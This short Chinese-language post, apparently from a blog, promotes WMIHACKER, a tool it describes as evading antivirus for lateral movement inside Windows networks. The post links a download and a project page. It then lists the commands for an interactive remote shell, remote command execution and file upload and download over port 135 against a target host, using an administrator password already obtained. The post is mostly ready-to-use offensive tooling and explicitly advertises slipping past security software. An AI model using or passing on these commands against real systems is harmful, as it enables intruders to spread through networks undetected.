免杀横向移动工具WMIHACKER

免杀横向移动工具WMIHACKER

交互式Shell命令执行文件上传文件下载

免杀横向渗透远程命令执行，常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令，这些方式都已经被杀软100%拦截，通过改造出WMIHACKER免杀横向移动测试工具。

其通过135端口进行命令执行，执行的结果读取以及无需445端口进行文件传输。此工具利用的前提条件是： 获取到目标主机的账户密码

可能会有人问既然我都拿到主机的账号密码，我远程直接登录不香吗？那远程桌面连接是不是需要开启3389端口，如果目标主机没有开启3389端口呢？那我使用此款工具是不是可以通过135端口就能实现命令执行，而且还可以实现文件上传/下载功能，同时还免杀。

免杀工具下载：https://wwe.lanzous.com/iCZOieai3sd 项目地址：https://github.com/360-Linton-Lab/WMIHACKER

以下 xx.xx.xx.xx 即目标主机内网IP地址

交互式Shell

# 获取交互式Shell cscript WMIHACKER_0.6.vbs /shell xx.xx.xx.xx administrator "Password!"

命令执行

# 有命令回显执行方式 cscript WMIHACKER_0.6.vbs /cmd xx.xx.xx.xx administrator "Password!" "ipconfig" 1 # 无命令回显执行方式 cscript WMIHACKER_0.6.vbs /cmd xx.xx.xx.xx administrator "Password!" "ipconfig > c:\1.txt" 0

文件上传

# 复制本机calc.exe到远程主机c:\calc.exe cscript wmihacker_0.4.vbe /upload xx.xx.xx.xx administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"

文件下载

# 下载远程主机calc.exe到本地c:\calc.exe cscript wmihacker_0.4.vbe /download xx.xx.xx.xx administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe" 我是为了好好偷懒才非常努力的XXR，See You Next Time.